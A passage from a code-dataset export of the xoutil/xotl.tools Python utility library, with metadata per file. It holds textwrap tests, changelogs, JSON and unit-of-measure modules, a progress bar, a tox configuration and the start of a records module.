be uniformly removed!\n text = \"\\thello there\\n\\thow are you?\"\n expect = \"hello there\\nhow are you?\"\n self.assertEqual(expect, dedent(text))\n\n text = \" \\thello there\\n \\thow are you?\"\n 
self.assertEqual(expect, dedent(text))\n\n text = \" \\t hello there\\n \\t how are you?\"\n self.assertEqual(expect, dedent(text))\n\n text = \" \\thello there\\n \\t how are you?\"\n expect = \"hello there\\n how are you?\"\n self.assertEqual(expect, dedent(text))\n\n\n# Test textwrap.indent\nclass IndentTestCase(unittest.TestCase):\n # The examples used for tests. If any of these change, the expected\n # results in the various test cases must also be updated.\n # The roundtrip cases are separate, because textwrap.dedent doesn't\n # handle Windows line endings\n ROUNDTRIP_CASES = (\n # Basic test case\n \"Hi.\\nThis is a test.\\nTesting.\",\n # Include a blank line\n \"Hi.\\nThis is a test.\\n\\nTesting.\",\n # Include leading and trailing blank lines\n \"\\nHi.\\nThis is a test.\\nTesting.\\n\",\n )\n CASES = ROUNDTRIP_CASES + (\n # Use Windows line endings\n \"Hi.\\r\\nThis is a test.\\r\\nTesting.\\r\\n\",\n # Pathological case\n \"\\nHi.\\r\\nThis is a test.\\n\\r\\nTesting.\\r\\n\\n\",\n )\n\n def test_indent_nomargin_default(self):\n # indent should do nothing if 'prefix' is empty.\n for text in self.CASES:\n self.assertEqual(indent(text, \"\"), text)\n\n def test_indent_nomargin_explicit_default(self):\n # The same as test_indent_nomargin, but explicitly requesting\n # the default behaviour by passing None as the predicate\n for text in self.CASES:\n self.assertEqual(indent(text, \"\", None), text)\n\n def test_indent_nomargin_all_lines(self):\n # The same as test_indent_nomargin, but using the optional\n # predicate argument\n predicate = lambda line: True\n for text in self.CASES:\n self.assertEqual(indent(text, \"\", predicate), text)\n\n def test_indent_no_lines(self):\n # Explicitly skip indenting any lines\n predicate = lambda line: False\n for text in self.CASES:\n self.assertEqual(indent(text, \" \", predicate), text)\n\n def test_roundtrip_spaces(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n 
self.assertEqual(dedent(indent(text, \" \")), text)\n\n def test_roundtrip_tabs(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n self.assertEqual(dedent(indent(text, \"\\t\\t\")), text)\n\n def test_roundtrip_mixed(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n self.assertEqual(dedent(indent(text, \" \\t \\t \")), text)\n\n def test_indent_default(self):\n # Test default indenting of lines that are not whitespace only\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n\\n Testing.\",\n # Include leading and trailing blank lines\n \"\\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \"\\n Hi.\\r\\n This is a test.\\n\\r\\n Testing.\\r\\n\\n\",\n )\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix), expect)\n\n def test_indent_explicit_default(self):\n # Test default indenting of lines that are not whitespace only\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n\\n Testing.\",\n # Include leading and trailing blank lines\n \"\\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \"\\n Hi.\\r\\n This is a test.\\n\\r\\n Testing.\\r\\n\\n\",\n )\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, None), expect)\n\n def test_indent_all_lines(self):\n # Add 'prefix' to all lines, including whitespace-only ones.\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n \\n Testing.\",\n # Include leading and 
trailing blank lines\n \" \\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \" \\n Hi.\\r\\n This is a test.\\n \\r\\n Testing.\\r\\n \\n\",\n )\n predicate = lambda line: True\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, predicate), expect)\n\n def test_indent_empty_lines(self):\n # Add 'prefix' solely to whitespace-only lines.\n prefix = \" \"\n expected = (\n # Basic test case\n \"Hi.\\nThis is a test.\\nTesting.\",\n # Include a blank line\n \"Hi.\\nThis is a test.\\n \\nTesting.\",\n # Include leading and trailing blank lines\n \" \\nHi.\\nThis is a test.\\nTesting.\\n\",\n # Use Windows line endings\n \"Hi.\\r\\nThis is a test.\\r\\nTesting.\\r\\n\",\n # Pathological case\n \" \\nHi.\\r\\nThis is a test.\\n \\r\\nTesting.\\r\\n \\n\",\n )\n predicate = lambda line: not line.strip()\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, predicate), expect)\n" }, { "alpha_fraction": 0.6038415431976318, "alphanum_fraction": 0.6134454011917114, "avg_line_length": 25.03125, "blob_id": "459595cee84cc0efba06907ecfc912b9cc1d5f05", "content_id": "169349396cde38e64d4b985d400802b5f5cb0169", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 833, "license_type": "permissive", "max_line_length": 77, "num_lines": 32, "path": "/docs/source/history/_changes-2.0.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- This is the first release for which Python 2 no longer supported. It was a\n good time! Good bye, Python 2!\n\n- The following imports are no longer available. Look for them in\n `xoutil.future`:mod:\\ :\n\n .. 
hlist::\n :columns: 3\n\n - ``xoutil.collection``\n - ``xoutil.datetime``\n - ``xoutil.functools``\n - ``xoutil.inspect``\n - ``xoutil.iterators``\n - ``xoutil.json``\n - ``xoutil.pprint``\n - ``xoutil.subprocess``\n - ``xoutil.textwrap``\n - ``xoutil.threading``\n - ``xoutil.types``\n\n- Deprecate modules that only provided a unifying mechanism between Python 2\n and 3, or that backported features from Python 3 to Python 2:\n\n .. hlist::\n :columns: 3\n\n - ``xoutil.annotate``\n - ``xoutil.eight``\n - ``xoutil.eight.urllib``\n\n- Remove deprecated module ``xoutil.html``.\n" }, { "alpha_fraction": 0.6961130499839783, "alphanum_fraction": 0.7102473378181458, "avg_line_length": 30.44444465637207, "blob_id": "e8419a6db579c5f75c3267c930671785fcdde4c2", "content_id": "b0174ef30d5d35b2fb763c7cf85f671037101f59", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 283, "license_type": "permissive", "max_line_length": 76, "num_lines": 9, "path": "/docs/source/history/_changes-2.1.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `~xotl.tools.iter_final_subclasses`:func: and\n `~xotl.tools.get_final_subclasses`:func:.\n\n- Stop support for Python 3.4.\n\n- Fix bug `#6`__: Instances of `~xotl.tools.symbols.boolean`:class: were not\n pickable.\n\n __ https://gitlab.merchise.org/merchise/xoutil/issues/6\n" }, { "alpha_fraction": 0.5410534739494324, "alphanum_fraction": 0.5511231422424316, "avg_line_length": 30.108434677124023, "blob_id": "e8208dbe48fd6aa30a4c52560b6981080d2e652b", "content_id": "a7ff019ac7e42315130ad4c769be483bf6f96cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 87, "num_lines": 83, "path": "/xotl/tools/progress.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": 
"UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tool to show a progress percent in the terminal.\n\n.. deprecated:: 2.1.0\n\n\"\"\"\n\n\n__all__ = [\"Progress\"]\n\n\n_HELIX = \"|/-\\\\\"\n\n\nclass Progress:\n \"\"\"\n Print a progress percent to the console. Also the elapsed and the\n estimated times.\n\n To signal an increment in progress just call the instance and (optionally)\n pass a message like in::\n\n progress = Progress(10)\n for i in range(10):\n progress()\n \"\"\"\n\n def __init__(self, max_value=100, delta=1, first_message=None, display_width=None):\n from xotl.tools.future.datetime import datetime\n\n self.max_value = max_value\n self.delta = delta\n self.percent = self.value = 0\n self.start_time = datetime.now()\n self.first_message = first_message\n self.display_width = display_width\n\n def __call__(self, progress=None, message=\"...\"):\n if self.first_message is not None:\n print(self.first_message)\n self.first_message = None\n if progress is None:\n self.value += self.delta\n else:\n self.value = progress\n percent = 100 * self.value // self.max_value\n if self.percent != percent:\n import sys\n from xotl.tools.future.datetime import strfdelta\n\n self.percent = percent\n helix = _HELIX[percent % len(_HELIX)]\n elapsed = self.start_time.now() - self.start_time\n _cls = type(elapsed)\n total = _cls(seconds=elapsed.total_seconds() * 100 / self.percent)\n _fmt = '\\r{helix} {percent}% - \"{elapsed}\" of about \"{total}\"'\n progress_line = _fmt.format(\n helix=helix,\n percent=percent,\n elapsed=strfdelta(elapsed),\n total=strfdelta(total),\n )\n max_width = self.display_width or self._get_terminal_width()\n _fmt = \"{message: >%d}\" % (max_width - len(progress_line) - 1)\n 
progress_line += _fmt.format(message=message)\n print(progress_line, end=(\"\" if percent != 100 else \"\\n\\r\"))\n sys.stdout.flush()\n\n def _get_terminal_width(self, default=120):\n import os\n\n try:\n return int(os.environ.get(\"COLUMNS\", default))\n except ValueError:\n return default\n" }, { "alpha_fraction": 0.7379310131072998, "alphanum_fraction": 0.7379310131072998, "avg_line_length": 47.33333206176758, "blob_id": "e2db3d57d34e4879c8358251313b68be8b7ce88a", "content_id": "4809361cfb68f0b43052603e75bf782950118726", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 290, "license_type": "permissive", "max_line_length": 75, "num_lines": 6, "path": "/docs/source/history/_changes-1.9.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Make `~xoutil.future.datetime.TimeSpan`:class: intersection *inversible*.\n Before, doing ``date.today() & TimeSpan()`` raised a TypeError, but\n swapping the operands worked. Now, both ways work.\n\n- Add `xoutil.objects.delegator`:func: and\n `xoutil.objects.DelegatedAttribute`:class:.\n" }, { "alpha_fraction": 0.6305732727050781, "alphanum_fraction": 0.6390658020973206, "avg_line_length": 28.4375, "blob_id": "afd4b00ee485fd1b8971b0a2d837f0473d8872d3", "content_id": "4920c63c9610dc94382b4d2b76cdb68e4eff2a9f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 471, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/future/json.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.json`:mod: - Encode and decode the JSON format\n=================================================================\n\n.. 
module:: xotl.tools.future.json\n\nThis module extends the standard library's `json`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autoclass:: JSONEncoder\n\n.. autofunction:: encode_string\n" }, { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 77, "blob_id": "f34cfb98dea28caac777692a4a63808c2b2f665a", "content_id": "758d41cd2fead918fc55b00b8b9869dece957296", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 78, "license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added module `xoutil.dim`:mod: -- Facilities to work with concrete numbers.\n" }, { "alpha_fraction": 0.7182741165161133, "alphanum_fraction": 0.7271573543548584, "avg_line_length": 33.260868072509766, "blob_id": "f3381056265f638f3c168bbd13cad3dd4665aa73", "content_id": "1961b116df3199c244b43baeecbcf16dac1a83dd", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 788, "license_type": "permissive", "max_line_length": 79, "num_lines": 23, "path": "/docs/source/history/changes-1.2.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Loads of improvements for Python 3k compatibility: Several modules were\n fixed or adapted to work on both Python 2.7 and Python 3.2. 
They include (but\n we might have forgotten some):\n\n - `xoutil.context`:mod:.\n - `!xoutil.aop.basic`:mod:.\n - `xoutil.deprecation`:mod:.\n - `!xoutil.proxy`:mod:.\n\n- Rescued `xoutil.annotate`:mod: and is going to be supported from\n now on.\n\n- Introduced module `xoutil.subprocess`:mod: and function\n `xoutil.subprocess.call_and_check_output`:func:.\n\n- Introduced module `xoutil.decorator.compat`:mod: that enables constructions\n that are interoperable in Python 2 and Python 3.\n\n- Introduced `xoutil.iterators.zip`:func:, `xoutil.iterators.izip`:func:,\n `xoutil.iterators.map`:func:, and `xoutil.iterators.imap`:func:.\n\n\n.. LocalWords: xoutil\n" }, { "alpha_fraction": 0.6474700570106506, "alphanum_fraction": 0.6484687328338623, "avg_line_length": 27.60952377319336, "blob_id": "1c78fb140b7e1119d2cc8915e9917f43ea283bf9", "content_id": "431ea90548d265216acb8174e375cb17b8f722f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3005, "license_type": "no_license", "max_line_length": 77, "num_lines": 105, "path": "/xotl/tools/future/json.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to the `json` standard library module.\n\nIt just adds the ability to encode/decode datetimes. But you should use the\nJSONEncoder yourself.\n\nYou may use this module as drop-in replacement to Python's `json`. 
Also it\ncontains definitions to use C library JSON speedups or Python replacements in\ncase that library is not installed in your system.\n\n\"\"\"\n\n# TODO: consider use IoC to extend python json module\n\nfrom json import * # noqa\nimport json as _stdlib # noqa\n\nfrom json import __all__ # noqa\n\n__all__ = list(__all__) + [\"file_load\", \"encode_string\"]\n\nfrom json import encoder, decoder # noqa\n\n\nclass JSONEncoder(_stdlib.JSONEncoder):\n __doc__ = (\n _stdlib.JSONEncoder.__doc__\n + \"\"\"\n xotl.tools extends this class by supporting the following data-types (see\n `default`:meth: method):\n\n - `datetime`, `date` and `time` values, which are translated to strings\n using ISO format.\n\n - `Decimal` values, which are represented as a string representation.\n\n - Iterables, which are represented as lists.\n\n \"\"\"\n )\n DATE_FORMAT = str(\"%Y-%m-%d\")\n TIME_FORMAT = str(\"%H:%M:%S\")\n DT_FORMAT = str(\"%s %s\") % (DATE_FORMAT, TIME_FORMAT)\n\n def default(self, obj):\n from datetime import datetime, date, time\n from decimal import Decimal\n from collections import Iterable\n\n if isinstance(obj, datetime):\n return obj.strftime(self.DT_FORMAT)\n elif isinstance(obj, date):\n return obj.strftime(self.DATE_FORMAT)\n elif isinstance(obj, time):\n return obj.strftime(self.TIME_FORMAT)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif isinstance(obj, Iterable):\n return list(iter(obj))\n return super().default(obj)\n\n\ntry:\n # New in version 3.5 of standard module.\n JSONDecodeError # noqa\nexcept NameError:\n # Previous implementations raise 'ValueError'\n JSONDecodeError = ValueError\n\n\ndef file_load(filename):\n with file(filename, \"r\") as f:\n return load(f) # noqa\n\n\n# --- encode strings ---\n\nfrom json.encoder import encode_basestring # noqa\n\ntry:\n from _json import encode_basestring_ascii\nexcept ImportError:\n from json.encoder import (\n py_encode_basestring_ascii as encode_basestring_ascii, # noqa\n )\n\n\ndef 
encode_string(string, ensure_ascii=True):\n \"\"\"Return a JSON representation of a Python string.\n\n :param ensure_ascii: If True, the output is guaranteed to be of type\n `str` with all incoming non-ASCII characters escaped. If False, the\n output can contain non-ASCII characters.\n\n \"\"\"\n encode = encode_basestring_ascii if ensure_ascii else encode_basestring\n return encode(string)\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.7422680258750916, "avg_line_length": 47.5, "blob_id": "76566717724126e2bb409de11e65864c60618027", "content_id": "25c64daab70f809c3871bfd2c57c551153bf5e22", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 97, "license_type": "permissive", "max_line_length": 77, "num_lines": 2, "path": "/docs/source/history/changes-1.2.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Adds `xoutil.bases`:mod: - Implementations of base 32 and base 64 (numeric)\n representations.\n" }, { "alpha_fraction": 0.6485998034477234, "alphanum_fraction": 0.6504064798355103, "avg_line_length": 24.744186401367188, "blob_id": "8fe0c907af8235ddb041589353aa7f0976bc2baf", "content_id": "4dfa4bb7bfd61ca6433824a893843c0b5b66fc77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 72, "num_lines": 43, "path": "/tests/test_codecs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import given\nfrom hypothesis.strategies import text, 
binary\n\n\n@given(s=binary())\ndef test_safe_decode_dont_fail_uppon_invalid_encoding(s):\n from xoutil.future.codecs import safe_decode\n\n assert safe_decode(s, \"i-dont-exist\") == safe_decode(s)\n\n\n@given(s=text())\ndef test_safe_encode_dont_fail_uppon_invalid_encoding(s):\n from xoutil.future.codecs import safe_encode\n\n assert safe_encode(s, \"i-dont-exist\") == safe_encode(s)\n\n\n@given(text())\ndef test_safe_encode_yields_bytes(s):\n from xoutil.future.codecs import safe_encode\n\n assert isinstance(safe_encode(s), bytes)\n\n\n@given(binary())\ndef test_safe_decode_yields_unicode(s):\n try:\n Text = unicode\n except NameError:\n Text = str # Python 3\n from xoutil.future.codecs import safe_decode\n\n assert isinstance(safe_decode(s), Text)\n" }, { "alpha_fraction": 0.6040372848510742, "alphanum_fraction": 0.6238353848457336, "avg_line_length": 17.140844345092773, "blob_id": "67195cf2f58e74fafa4518b82dcf9a27c2c58bb6", "content_id": "de57401de7739840ab80403612fdccd2e4edcd9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 80, "num_lines": 142, "path": "/xotl/tools/dim/base.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"The standard `physical quantities`_.\n\n.. 
_physical quantities: \\\nhttps://en.wikipedia.org/wiki/International_System_of_Quantities#Base_quantities\n\n\"\"\"\n\nfrom .meta import Dimension, UNIT\n\n\ndef kilo(v):\n return 1000 * v\n\n\ndef centi(v):\n return v / 100\n\n\ndef milli(v):\n return v / 1000\n\n\ndef micro(v):\n return v / 1000000\n\n\ndef nano(v):\n return v / (10 ** 9)\n\n\[email protected]()\nclass Length:\n metre = UNIT\n kilometer = km = kilo(metre)\n centimeter = cm = centi(metre)\n millimeter = mm = milli(metre)\n nanometer = nm = nano(metre)\n\n\nmetre = m = Length.m = Length.metre\nL = Length\n\n\[email protected]\nclass Time:\n second = UNIT\n millisecond = ms = milli(second)\n nanosecond = ns = nano(second)\n minute = second * 60\n hour = minute * 60\n\n\nsecond = s = Time.s = Time.second\nT = Time\n\n\[email protected](unit_aliases=(\"kg\",))\nclass Mass:\n kilogram = UNIT\n gram = kilogram / 1000\n\n\nkilogram = kg = Mass.kg\nM = Mass\n\n\[email protected](unit_aliases=\"A\")\nclass ElectricCurrent:\n ampere = UNIT\n milliampere = milli(ampere)\n\n\nA = ampere = ElectricCurrent.A\nI = ElectricCurrent\n\n\[email protected](unit_aliases=\"K\")\nclass Temperature:\n kelvin = UNIT\n\n @classmethod\n def from_celcius(cls, val):\n \"Convert `val` ºC to K\"\n return (val + 273.15) * cls.kelvin\n\n @classmethod\n def from_fahrenheit(cls, val):\n \"Convert `val` ºF to K\"\n return (val + 459.67) * (5 / 9) * cls.kelvin\n\n\nK = kelvin = Temperature.K\nO = Temperature # The actual symbol would be the capital letter Theta: Θ\n\n\[email protected](unit_alias=\"mol\")\nclass Substance:\n mole = UNIT\n\n\nmole = mol = Substance.mol\nN = Substance\n\n\[email protected]\nclass Luminosity:\n candela = UNIT\n\n\nJ = Luminosity\n\n\n# Derived quantities\nArea = L ** 2\nVolume = L ** 3\nVolume.metre_cubic = Volume._unit_\nVolume._unitname_ = \"metre_cubic\"\n\nFrequency = T ** -1\nFrequency.Hz = Frequency._unit_\n\nForce = L * M / T ** 2\nassert hasattr(Force, 
\"metre_kilogram_per_second_squared\")\nassert Force == L * M * T ** -2\nForce.Newton = Force.N = Force._unit_\n\nPresure = M / L / T ** 2\nassert hasattr(Presure, \"kilogram_per_metre_per_second_squared\")\nassert Presure == L ** -1 * M * T ** -2, \"as defined in Wikipedia\"\nPresure.Pascal = Presure.Pa = Presure._unit_\n\nVelocity = L / T\nAcceleration = L / T ** 2\n" }, { "alpha_fraction": 0.5762237906455994, "alphanum_fraction": 0.5832167863845825, "avg_line_length": 19.428571701049805, "blob_id": "e29b352c28fd18755fd51b2c014ca1389b4cf0aa", "content_id": "968a9f599b48162b553298ef6b7e011a2772dfab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 76, "num_lines": 35, "path": "/xotl/tools/release.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\ntry:\n from ._version import get_version\n\n VERSION = get_version()\n\nexcept ImportError:\n from ._version import get_versions\n\n VERSION = get_versions()[\"version\"]\n\n\nRELEASE_TAG = \"\"\n\n\ndef safe_int(x):\n try:\n return int(x)\n except ValueError:\n return x\n\n\n# I won't put the release tag in the version_info tuple. 
Since PEP440 is on\n# the way.\nVERSION_INFO = tuple(safe_int(x) for x in VERSION.split(\".\"))\n\n\ndel safe_int\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "c564ebb33b3832f108275252d457d57c8c9d65f5", "content_id": "ac7a591d5f889083fc96b833b738d30da6f744ef", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.9 <rel-1.9.9>`:ref:\\\n" }, { "alpha_fraction": 0.4969879388809204, "alphanum_fraction": 0.5933734774589539, "avg_line_length": 17.97142791748047, "blob_id": "43309a8dc4762e6946b0a792fba6b4d2fb1d4a09", "content_id": "567c37f900d9b1fe0be71d6ed298aa04214b64b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 664, "license_type": "no_license", "max_line_length": 59, "num_lines": 35, "path": "/tox.ini", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n {3.4,3.5,3.6,3.7,pypy}-unit\n {3.4,3.5,3.6,3.7,pypy}-greenlets\n 3.6-staticcheck\n\n[testenv]\nbasepython =\n 3.4: python3.4\n 3.5: python3.5\n 3.6: python3.6\n 3.7: python3.7\n system: python3\n pypy: pypy3\n\ndeps = python-dateutil==2.6.1\n mock<1.3\n pytest~=5.2\n hypothesis>=4.26.4,<5\n pytz==2017.2\n pytest-xdist==1.26.1\n pytest-cov==2.6.1\n\n greenlets: greenlet\n\n staticcheck: mypy==0.630\n\n\nsitepackages = False\nrecreate = False\n\ncommands=\n unit: py.test -l -q --cov=xotl.tools []\n greenlets: py.test -l -q -k greenlet []\n staticcheck: mypy -p xotl.tools --ignore-missing-imports\n" }, { "alpha_fraction": 0.4262734651565552, "alphanum_fraction": 
0.4262734651565552, "avg_line_length": 19.72222137451172, "blob_id": "af33f6398684f03cbbaf23c8a9e7b2f38c88f233", "content_id": "944c836a20dedd418831e9e0c197938673982326", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 373, "license_type": "permissive", "max_line_length": 62, "num_lines": 18, "path": "/docs/source/xotl.tools/cli.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.cli`:mod: -- Command line application facilities\n==============================================================\n\n.. automodule:: xotl.tools.cli\n :members:\n\nApplications\n============\n\n.. automodule:: xotl.tools.cli.app\n :members:\n\nTools\n=====\n\n.. automodule:: xotl.tools.cli.tools\n :members:\n" }, { "alpha_fraction": 0.6078903079032898, "alphanum_fraction": 0.6175082325935364, "avg_line_length": 29.76438331604004, "blob_id": "72d55ea2153b828499e631b1f41ffc87ae734bdb", "content_id": "a63f252b5ddfaf5da353c849d7105afcf53b2076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11230, "license_type": "no_license", "max_line_length": 87, "num_lines": 365, "path": "/xotl/tools/records.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Records definitions.\n\nA record allows to describe plain external data and a simplified model to\n*read* it. 
The main use of records is to represent data that is read from a\n`CSV file <305>`:pep:.\n\nSee the `record`:class: class to find out how to use it.\n\n\"\"\"\n\n\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.future.functools import lru_cache\n\n\n@lru_cache()\ndef field_descriptor(field_name):\n \"\"\"Returns a read-only descriptor for `field_name`.\"\"\"\n\n class descriptor:\n def __get__(self, instance, owner):\n if instance:\n return owner.get_field(\n instance._raw_data, owner._rec_fields[field_name]\n )\n else:\n return self\n\n return descriptor\n\n\nclass _record_type(type):\n @staticmethod\n def _is_rec_definition(attr, val=Unset):\n result = not attr.startswith(\"_\") and attr.upper() == attr\n if val is not Unset:\n from numbers import Integral\n\n result = result and isinstance(val, (Integral, str))\n return result\n\n @staticmethod\n def is_reader(attr, func, fields=None):\n from xotl.tools.future.types import FunctionType\n\n attr = attr.lower()\n good_name = attr.startswith(\"_\") and attr.endswith(\"_reader\")\n good_type = isinstance(func, (FunctionType, staticmethod))\n return good_name and good_type\n\n def __new__(cls, name, bases, attrs):\n def static(f):\n return f if isinstance(f, staticmethod) else staticmethod(f)\n\n cls_fields = {\n attr: val\n for attr, val in attrs.items()\n if cls._is_rec_definition(attr, val)\n }\n descriptors = {attr.lower(): field_descriptor(attr)() for attr in cls_fields}\n readers = {\n attr.lower(): static(func)\n for attr, func in attrs.items()\n if cls.is_reader(attr, func)\n }\n new_attrs = dict(attrs, **descriptors)\n new_attrs.update(readers)\n result = super().__new__(cls, name, bases, new_attrs)\n # Make a copy, or else the super-class attribute gets contaminated\n fields = dict(getattr(result, \"_rec_fields\", {}))\n index = dict(getattr(result, \"_rec_index\", {}))\n fields.update(cls_fields)\n if len(fields) != len({val for val in fields.values()}):\n msg = 'Duplicated field index definition in 
class \"%s\"' % name\n import logging\n\n logger = logging.getLogger(__name__)\n logger.error(msg)\n logger.debug(fields)\n raise TypeError(msg)\n result._rec_fields = fields\n index.update({val: attr for attr, val in cls_fields.items()})\n result._rec_index = index\n return result\n\n def get_field(self, raw_data, field):\n from xotl.tools.symbols import Undefined\n\n field_name = self._rec_index[field]\n try:\n value = raw_data[field]\n except (IndexError, KeyError):\n value = Undefined\n reader_name = \"_%s_reader\" % field_name.lower()\n reader = getattr(self, reader_name, None)\n if reader:\n return reader(value)\n else:\n return value\n\n\nclass record(metaclass=_record_type):\n \"\"\"Base record class.\n\n Records allow to represent a sequence or mapping of values extracted from\n external sources into a dict-like Python value.\n\n The first use-case for this abstraction is importing data from a `CSV file\n <305>`:pep:. You could represent each line as an instance of a properly\n defined record.\n\n An instance of a record would represent a single `line` (or row) from the\n external data source.\n\n Records are expected to declare `fields`. Each field must be a\n CAPITALIZED valid identifier like::\n\n >>> class INVOICE(record):\n ... ID = 0\n ... REFERENCE = 1\n\n Fields must be integers or plain strings. Fields must not begin with an\n underscore (\"_\"). External data lines are required to support indexes of\n those 